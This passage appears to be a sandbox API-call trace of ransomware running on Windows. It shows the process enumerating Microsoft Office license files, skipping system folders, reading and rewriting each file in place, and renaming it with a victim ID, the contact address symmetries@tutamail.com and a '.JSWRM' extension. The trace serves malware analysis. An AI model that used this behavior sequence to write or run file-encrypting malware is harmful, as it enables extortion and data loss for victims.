(HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0109.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0109.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0109.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0109.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0109.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.276] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0109.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0109.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0109.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0109.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0109.277] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea472403, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea472403, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea530ff3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5eec, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_Retail-ppd.xrm-ms", cAlternateFileName="PRAA67~1.XRM")) returned 1 [0109.277] lstrcmpiW (lpString1="ProPlusR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0109.277] lstrcmpiW (lpString1="ProPlusR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0109.277] lstrcmpiW (lpString1="ProPlusR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0109.277] lstrcmpiW (lpString1="ProPlusR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0109.277] lstrcmpiW (lpString1="ProPlusR_Retail-ppd.xrm-ms", lpString2="recovery") returned -1 [0109.277] lstrcmpiW (lpString1="ProPlusR_Retail-ppd.xrm-ms", lpString2="perflogs") returned 1 [0109.277] lstrcmpiW (lpString1="ProPlusR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0109.277] lstrcmpiW (lpString1="ProPlusR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.277] lstrcmpiW (lpString1="ProPlusR_Retail-ppd.xrm-ms", lpString2="system volume information") returned -1 [0109.277] lstrcmpiW (lpString1="ProPlusR_Retail-ppd.xrm-ms", lpString2="msocache") returned 1 [0109.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Retail-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0109.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0109.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Retail-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240f20, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0109.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0109.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Retail-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0109.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0109.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Retail-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241330, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0109.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0109.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0109.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0109.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0109.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.278] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24300) returned 1 [0109.278] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5ee0) returned 0x24c1d0 [0109.279] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5ee0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5ee0, lpOverlapped=0x0) returned 1 [0109.281] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.281] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5ee0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5ee0, lpOverlapped=0x0) returned 1 [0109.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.282] CloseHandle (hObject=0x45c) returned 1 [0109.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0109.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0109.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0109.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0109.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0109.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0109.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0109.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0109.282] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0109.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0109.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0109.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0109.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0109.283] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea472403, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea472403, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea662288, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d40, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_Retail-ul-oob.xrm-ms", cAlternateFileName="PR5CD8~1.XRM")) returned 1 [0109.283] lstrcmpiW (lpString1="ProPlusR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0109.283] lstrcmpiW (lpString1="ProPlusR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0109.283] lstrcmpiW (lpString1="ProPlusR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0109.283] lstrcmpiW (lpString1="ProPlusR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0109.283] lstrcmpiW (lpString1="ProPlusR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0109.283] lstrcmpiW (lpString1="ProPlusR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0109.283] lstrcmpiW (lpString1="ProPlusR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0109.283] lstrcmpiW (lpString1="ProPlusR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.283] lstrcmpiW (lpString1="ProPlusR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0109.283] lstrcmpiW (lpString1="ProPlusR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0109.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Retail-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0109.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Retail-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2412b8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0109.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Retail-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0109.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Retail-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241308, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0109.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0109.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0109.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0109.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.284] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11584) returned 1 [0109.285] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0109.285] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0109.287] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.287] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0109.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.287] CloseHandle (hObject=0x45c) returned 1 [0109.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0109.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0109.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0109.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0109.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0109.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0109.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0109.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0109.287] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0109.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0109.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0109.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0109.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0109.288] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea3d9a66, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea3d9a66, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea4be895, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dd9, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_Retail-ul-phn.xrm-ms", cAlternateFileName="PR653C~1.XRM")) returned 1 [0109.288] lstrcmpiW (lpString1="ProPlusR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0109.288] lstrcmpiW (lpString1="ProPlusR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0109.288] lstrcmpiW (lpString1="ProPlusR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0109.289] lstrcmpiW (lpString1="ProPlusR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0109.289] lstrcmpiW (lpString1="ProPlusR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0109.289] lstrcmpiW (lpString1="ProPlusR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0109.289] lstrcmpiW (lpString1="ProPlusR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0109.289] lstrcmpiW (lpString1="ProPlusR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.289] lstrcmpiW (lpString1="ProPlusR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0109.289] lstrcmpiW (lpString1="ProPlusR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0109.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Retail-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0109.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Retail-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0109.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Retail-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0109.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Retail-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2411f0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0109.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0109.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0109.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0109.289] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.290] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19929) returned 1 [0109.290] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24c1d0 [0109.290] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dd0, lpOverlapped=0x0) returned 1 [0109.292] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.292] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, 